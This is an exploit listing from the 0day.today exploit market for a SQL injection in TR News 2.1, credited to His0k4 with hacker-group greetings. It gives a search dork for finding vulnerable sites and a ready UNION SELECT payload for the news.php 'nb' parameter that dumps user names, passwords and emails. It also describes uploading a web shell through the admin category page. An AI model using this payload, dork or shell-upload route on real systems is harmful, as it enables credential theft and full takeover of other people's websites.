[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TR News 2.1 (nb) Remote SQL Injection Vulnerability

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2908
Category
web applications
Date add
20-04-2008
Platform
unsorted
===================================================
TR News 2.1 (nb) Remote SQL Injection Vulnerability
===================================================



########################################################
#                                                      # 
#  Discovered by : His0k4 {Algerian HaCker}            #
#                                                      #
#  Greetz to: All Dz & muslims HaCkeRs  :)             #
#                                                      #
#  Special Greetz:c02,Spym4n,THe-MooRiSH               #
#                                                      #
########################################################
#
#  Script   : Tr Script News v2.1
#
#  Download script     : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
#  Dork        : inurl:news.php?mode=voir
#
#  Vulnerable file    : news.php
#
#  P.O.C
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
# 
#  Exemple:
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
#  Admin login: /admin
#
#  Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
#
#############################################################################



#  0day.today [2024-12-23]  #